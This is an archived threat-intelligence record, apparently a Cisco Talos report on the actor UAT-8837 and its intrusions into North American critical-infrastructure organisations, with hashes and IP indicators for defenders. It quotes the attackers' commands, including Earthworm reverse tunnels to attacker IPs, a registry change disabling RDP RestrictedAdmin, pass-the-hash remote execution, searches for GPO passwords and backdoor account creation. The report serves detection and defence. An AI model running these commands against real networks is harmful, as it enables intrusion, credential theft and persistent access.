{
	"id": "c6bf8c10-26fc-4475-9990-8cdb0db508a7",
	"created_at": "2026-04-06T00:20:17.849336Z",
	"updated_at": "2026-04-10T03:36:01.598674Z",
	"deleted_at": null,
	"sha1_hash": "3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8",
	"title": "UAT-8837 targets critical infrastructure sectors in North America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74901,
	"plain_text": "UAT-8837 targets critical infrastructure sectors in North America\r\nBy Asheer Malhotra\r\nPublished: 2026-01-15 · Archived: 2026-04-05 15:40:10 UTC\r\nThursday, January 15, 2026 06:00\r\nCisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures\r\n(TTPs) with those of other known China-nexus threat actors.\r\nBased on UAT-8837's TTPs and post-compromise activity Talos has observed across multiple intrusions,\r\nwe assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.\r\nAlthough UAT-8837's targeting may appear sporadic, since at least 2025, the group has clearly focused on\r\ntargets within critical Infrastructure sectors in North America.\r\nAfter obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised\r\ncredentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as\r\ncredentials, security configurations, and domain and Active Directory (AD) information to create multiple\r\nchannels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and\r\nremote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a\r\nViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access\r\nto zero-day exploits.\r\nPost-compromise actions\r\nUAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most\r\nrecently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-\r\n53690, to obtain initial access.\r\nAfter UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following\r\ncommands:\r\nping google[.]com\r\ntasklist /svc\r\nnetstat -aon -p TCP\r\nwhoami\r\nquser\r\nhostname\r\nnet user\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 1 of 8\n\nThe threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting\r\ninto other devices:\r\nREG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000\r\nA shell console may subsequently be opened via “cmd.exe” to conduct hands-on keyboard activity on the\r\ncompromised endpoint. Multiple artifacts are then downloaded to the following directories which were\r\nextensively used for staging artifacts:\r\nC:\\Users\\\u003cuser\u003e\\Desktop\\\r\nC:\\windows\\temp\\\r\nC:\\windows\\public\\music\r\nUAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be\r\nbecause many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint\r\n(CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not\r\ndetected.\r\nGoTokenTheft\r\nThe GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:\\Users\\\r\n\u003cuser\u003e\\Desktop\\go.exe, it may be used to steal tokens to run commands with elevated privileges:\r\neee.ico REG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0\r\nEarthworm\r\nEarthworm is network tunneling tool that has extensively been used by Chinese-speaking threat actors in\r\nintrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple\r\nversions of Earthworm to determine which are not detectable by endpoint protection products. The undetected\r\nversion is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:\r\nC:\\Windows\\Temp\\v.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433\r\n \r\nC:\\users\\public\\videos\\verr.ico -s rssocks -d 172.188.162.183 -e 443\r\n \r\nC:\\Windows\\Temp\\eir.ico -p 8888 -t 172[.]188[.]162[.]183 -f 11112\r\n \r\ncisos.ico -s rssocks -d 172[.]188[.]162[.]183 –e80\r\n \r\nvgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\r\n \r\nvgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 2 of 8\n\nabc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448\n\nC:\\users\\public\\music\\aa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443\n\nC:\\Users\\public\\Music\\twd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443\nDWAgent\nUAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint\nand drop additional malware to the system:\nC:\\Users\\\\Downloads\\dwagent.exe\nC:\\Users\\\\AppData\\Local\\Temp\\dwagent20250909101732\\runtime\\dwagent.exe -S -m installer\nSharpHound\nPer Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory\ninformation:\nC:\\Windows\\Temp\\SharpHound.exe\nImpacket\nUAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:\nC:\\Windows\\Temp\\wec.ico\nWhen Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated\nprivileges:\nC:\\Windows\\Temp\\Invoke-WMIExec.ps1\nGoExec\nIn one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote\nexecution tool to execute commands on other connected remote endpoints within the victim’s network:\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u /\n\n-H -e 'cmd.exe' -a '/C hostname /all' -o-\nC:\\Windows\\Temp\\goe.exe wmi proc 10[.]xx[.]xx[.]xx \\\nhttps://blog.talosintelligence.com/uat-8837/\nPage 3 of 8\n\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u /\n\n--nt-hash -e cmd.exe -a /C hostname -o 1.txt\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u --nt-hash -e cmd.exe -a /C hostname -o 1.txt\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u --nt-hash 00000000000000000000000000000000: -e cmd\ngoe.ico dcom mmc 10[.]xx[.]xx[.]xx -u --nt-hash 00000000000000000000000000000000: -e cmd\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C hostname -o 1.txt\ng.ico dcom mmc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C ipconfig -o-g.ico wmi proc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C hostname -o-It is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by\nthe constant detection and blocking of the threat actors tooling by CSE.\nThe threat actor also attempted to download and execute SharpWMI in the compromised environment, which was\nagain detected by CSE:\nC:\\Windows\\Temp\\s.ico\nRubeus\nRubeus, a C# based toolset for Kerberos abuse may also be deployed:\nC:\\Windows\\Temp\\r.ico\nC:\\Windows\\Temp\\lo.txt\nCertipy\nUAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:\nC:\\Windows\\Temp\\Certipy.exe\nHands-on-keyboard activity\nUAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials\nfrom victim organizations:\nfindstr /S /l cpassword [\\\\]\\policies\\*.xml\n The system’s security configuration is also exported using secedit:\nhttps://blog.talosintelligence.com/uat-8837/\nPage 4 of 8\n\nsecedit /export /cfg C:\\windows\\temp\\pol.txt\r\n Windows Local security policies extracted via secedit include password policies, user rights and audit settings.\r\nThis information may be valuable to adversaries who seek to evaluate an endpoint's security posture including\r\nnetwork security settings.\r\nIn one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim’s products,\r\nraising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply\r\nchain compromises and reverse engineering to find vulnerabilities in those products.\r\nDomain reconnaissance\r\nThe net commands typically used to query domain groups and users are:\r\nnet group domain admins /domain\r\nnet localgroup administrators /domain\r\nnet group \u003cname\u003e /domain\r\nnet user \u003cuser\u003e \u003cpassword\u003e /domain\r\nnet user \u003cuser\u003e /domain\r\nnet accounts /domain\r\nnet user \u003cuser\u003e /domain\r\nnltest /DCLIST:\u003cdomain\u003e\r\nnslookup \u003csubdomina\u003e.\u003cdomain\u003e\r\n The setspn command is used to list and query Service Principal Names (SPN) data from Active Directory:\r\nsetspn -L\r\nsetspn -Q */*\r\nActive Directory reconnaissance\r\nUAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These\r\ntools include SharpHound and Certipy. The threat actor also uses the Windows-native tool “setspn” to query for\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 5 of 8\n\nAD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor\r\ndeployed dsget and dsquery to query for specific properties in the AD:\r\ndsquery.exe user -limit 0\r\n \r\ndsquery.exe user -name \u003cname\u003e\r\n \r\ndsget user -samid -display -email -upn\r\n \r\ndsget.exe user -samid -display -email -upn\r\n \r\ndsquery.exe user -samid \u003cid\u003e\r\n \r\ndsget.exe user -display -email -upn\r\n \r\ndsquery.exe user -name admin\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -samid -display -e\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -upn\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com –memberof\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com –disabled\r\n \r\ndsquery * DC=prod,DC=\u003cdomain\u003e,DC=com -filter (objectClass=user) -attr * -limit 0\r\nBackdoored user accounts\r\nThe threat actor created user accounts to open up another channel of access to the compromised environment:\r\nnet user \u003cuser\u003e \u003cpassword\u003e /add /domain\r\nIn another instance, UAT-8837 added an existing user account to local groups:\r\nnet user \u003cuser\u003e\r\n \r\nnet localgroup \u003cgroup\u003e \u003cuser\u003e /add\r\nCoverage\r\nThe following ClamAV signature detects and blocks this threat:\r\nWin.Malware.Earthworm\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 6 of 8\n\nThe following Snort Rules (SIDs) detect and block this threat:\r\nSnort 2 – 61883, 61884, 63727, 63728\r\nSnort 3 – 300585, 63727, 63728\r\nIndicators of compromise (IOCs)\r\nThe IOCs for this threat are also available at our GitHub repository here.\r\n1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft\r\n451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd - Earthworm\r\nB3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm\r\nFab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm\r\n4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 - Earthworm\r\n891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 - GoTokenTheft\r\n5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound\r\n6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket\r\n887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec\r\n4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c - GoExec\r\n1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI\r\n51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus\r\n2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus\r\nE27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy\r\nB7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb\r\n42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3\r\n6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d\r\n4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295\r\nBDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8\r\n1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700\r\nd0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c\r\n194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794\r\n74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3\r\nCed14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31\r\n8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a\r\n5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd\r\n8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c\r\nDe9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7\r\n4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98\r\n74[.]176[.]166[.]174\r\n20[.]200[.]129[.]75\r\n172[.]188[.]162[.]183\r\n4[.]144[.]1[.]47\r\n103[.]235[.]46[.]102\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 7 of 8\n\nSource: https://blog.talosintelligence.com/uat-8837/\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-8837/"
	],
	"report_names": [
		"uat-8837"
	],
	"threat_actors": [
		{
			"id": "86abe737-6f26-477b-b163-37f4f55d2e8a",
			"created_at": "2026-01-23T02:00:03.294379Z",
			"updated_at": "2026-04-10T02:00:03.933223Z",
			"deleted_at": null,
			"main_name": "UAT-8837",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-8837",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434817,
	"ts_updated_at": 1775792161,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.pdf",
		"text": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.txt",
		"img": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.jpg"
	}
}